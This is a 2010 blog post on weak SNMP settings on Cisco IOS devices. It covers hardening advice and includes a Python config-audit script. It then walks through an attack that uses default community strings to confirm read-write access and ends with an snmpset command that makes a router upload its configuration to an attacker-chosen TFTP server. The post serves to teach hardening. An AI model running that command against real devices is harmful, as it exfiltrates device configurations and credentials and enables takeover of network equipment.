
Secure Your SNMP!!

by on October 7, 2010

In this post, I’m going to briefly discuss some of the age-old security issues identified with SNMP configurations, specifically on Cisco IOS network devices.

SNMP Configuration

Recently, during a number of external tests across the Internet, I’ve gained privileged access to many Cisco IOS devices configured with poor SNMP settings.  And yet the poor SNMP configurations I’ve exploited have been so well documented across the Internet that I’m amazed so many Cisco devices are vulnerable!!  Here are some examples of what SNMP Read-Write access to a Cisco device allows:

  1. Interfaces can be shut down
  2. Device can be rebooted
  3. IP routes can be changed, removed or added
  4. Device configuration can be uploaded to a TFTP server for further analysis
  5. Device passwords can be reset

Naturally, none of these should be possible for your Internet-facing devices. :o)

SNMP Default Community Strings – Never ever use them.  Most SNMP devices will default to public for read-only access and private for read-write access.  Even if nothing else is done to the SNMP configuration, change these values to something strong… throw in lower case, upper case, special characters and make them long!!

SNMP Permissions – If, for network monitoring purposes, you only need to poll SNMP values on your network device then completely disable any read-write access; it’s not needed and should only be enabled if you are making configuration changes to the device.

[Image: Cisco IOS configuration snippet #1]

This is the worst possible configuration.  Not only is the common public string used, but it also allows full read-write access to the device.

[Image: Cisco IOS configuration snippet #2]

Same as above, just don’t bother using this either.  Allows full read-write access using the equally common private string.

[Image: Cisco IOS configuration snippet #3]

Notice the string is more complex and of reasonable length?  You’ll also see that read-write access has been removed.

SNMP Access Filters/Lists – Making sure only legitimate management devices/hosts can access your SNMP-enabled devices is good practice.  Assuming a strong SNMP community string has now been chosen and configured, it’s worth restricting SNMP access on each device to only those hosts that need it.

The Cisco IOS “snmp-server” command allows an IOS standard or extended access list to be specified:

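As an added example (not from the original post), the following Python audit applies the three checks described above to the "snmp-server community" lines of a saved IOS configuration: default strings, read-write access, and a missing access list. The sample configuration is constructed, and the 16-character minimum length is an assumption, not a figure from the post.

```python
import re

DEFAULT_COMMUNITIES = {"public", "private"}  # defaults named in the post

# snmp-server community <string> [view <name>] [ro|rw] [<access-list>]
COMMUNITY_RE = re.compile(
    r"^\s*snmp-server\s+community\s+(?P<string>\S+)"
    r"(?:\s+view\s+\S+)?(?:\s+(?P<mode>ro|rw))?(?:\s+(?P<acl>.+?))?\s*$",
    re.IGNORECASE,
)

# Constructed sample, not taken from any real device.
SAMPLE_CONFIG = """\
snmp-server community public RW
snmp-server community private RW
snmp-server community c0nstructed#RO-Example! RO
snmp-server community An0ther#Constructed-Str1ng RO 10
access-list 10 permit 192.0.2.10
"""


def is_strong(community, min_length):
    """Long, with lower case, upper case and special characters."""
    return (len(community) >= min_length
            and any(c.islower() for c in community)
            and any(c.isupper() for c in community)
            and any(not c.isalnum() for c in community))


def audit_snmp(config_text, min_length=16):
    """Return (community, findings) for every snmp-server community line."""
    results = []
    for line in config_text.splitlines():
        m = COMMUNITY_RE.match(line)
        if not m:
            continue
        community = m.group("string")
        mode = (m.group("mode") or "ro").lower()  # IOS defaults to read-only
        findings = []
        if community.lower() in DEFAULT_COMMUNITIES:
            findings.append("default community string")
        elif not is_strong(community, min_length):
            findings.append("weak community string")
        if mode == "rw":
            findings.append("read-write access enabled")
        if not m.group("acl"):
            findings.append("no access list restricting SNMP sources")
        results.append((community, findings))
    return results


if __name__ == "__main__":
    for community, findings in audit_snmp(SAMPLE_CONFIG):
        print(community, "->", findings or "ok")
```

Only the last community line in the sample comes back with no findings: a strong string, read-only, and bound to access list 10.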

SNMP Example

After discovering that a device is listening on UDP port 161 (SNMP), an SNMP enumeration tool can be used to extract information from the device.  Tools such as SNMPWalk or SNMPEnum are two that I use regularly.  SNMPWalk queries the device with a standard set of MIBs.  With SNMPEnum you can specify a configuration file supplied with the tool that queries for additional vendor-specific values.  In the case of Cisco, SNMPEnum can return running processes, recent terminal users and the system log (amongst others).

Here a read-only community string of public is being used on Cisco switch 192.168.1.1.  This assumes the SNMP community strings are known…..otherwise you’ll have to guess!!  We can see below that the string worked since the device responded with a series of values:


Now let’s check if SNMP read-write access is possible.  Using the same command, I just change the -c switch to use the read-write community string.  In this example it’s private; a well-known and obvious read-write community string:


I now know that private is a valid string since data was returned, but I need to confirm that private is in fact the read-write string.  I can attempt to change a harmless value on the device.  In this case we’ll set the “sysName” value (string) to “PENTURA”.  If accepted by the device, I’ll know that private is the read-write community string.

To make a change via SNMP, I use the tool SNMPSet and specify the Object ID (OID); the numerical representation of “sysName”.  SNMPWalk can be used with the “-On” switch to display OIDs instead:


“sysName” is represented as “.1.3.6.1.2.1.1.5.0”.  I’ll use the SNMPSet command to change this value to “PENTURA”.  In the command example below, the “s” instructs SNMPSet that I want to write a string value.


So that confirms private is a read-write community string.  Now I can go ahead and extract the IOS configuration.  I start my TFTP server and, using the SNMPSet command, configure the router to upload its configuration to an IP address I specify. 

Here’s an example of the command (I’ll leave you to play!)

#snmpset -v 1 -c <rw-community-string> <target_device_ip> .1.3.6.1.4.1.9.2.1.55.<TFTP_Server_IP> s <local_tftp_filename>
